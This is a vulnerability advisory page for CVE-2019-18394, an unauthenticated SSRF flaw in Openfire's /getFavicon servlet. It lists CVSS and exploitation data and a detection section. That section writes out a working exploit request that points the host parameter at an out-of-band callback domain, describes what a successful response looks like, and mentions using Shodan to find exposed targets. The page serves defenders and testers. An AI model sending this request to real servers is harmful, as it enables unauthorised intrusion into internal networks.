cbcvebase.
CVE-2019-18394
published 2019-10-24

CVE-2019-18394: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET…

PriorityP181critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
32.30%
98.1th percentile
A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests.

Affected

2 ranges
VendorProductVersion rangeFixed in
igniterealtimeopenfire<= 4.4.2
pascomcloud_phone_system<= 7.19

Detection & IOCsextracted from sources · hover to see the quote

url/getFavicon?host=oast.fun?
domainoast.fun
path/getFavicon
  • The vulnerable endpoint is /getFavicon with a `host` parameter; send a GET request with an out-of-band callback domain as the host value and look for an HTTP interaction on the OAST server to confirm SSRF.
  • A successful SSRF exploitation returns HTTP 200 with Content-Type image/x-icon and a body containing 'Interactsh Server'.
  • Identify exposed Openfire Admin Console instances via Shodan queries on http.title to prioritise scanning targets.
  • The vulnerability is unauthenticated (PR:N, UI:N) and affects Openfire <=4.4.3; any internet-facing Openfire instance on that version should be treated as exploitable without credentials.
  • The same SSRF primitive exists in the XMPP Server component (xmppserver jar) of the Jive platform as used in Pascom Cloud Phone System before 7.20.x — monitor backend Tomcat traffic for unexpected outbound requests originating from the /getFavicon handler.
  • ·The OAST domain 'oast.fun' used in the nuclei template is the Interactsh public server; replace it with a privately controlled out-of-band server in production testing to avoid leaking target information.
  • ·The trailing '?' appended after the OAST domain in the host parameter is intentional to truncate any additional path appended by the server, ensuring the callback goes to the root of the OOB host.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.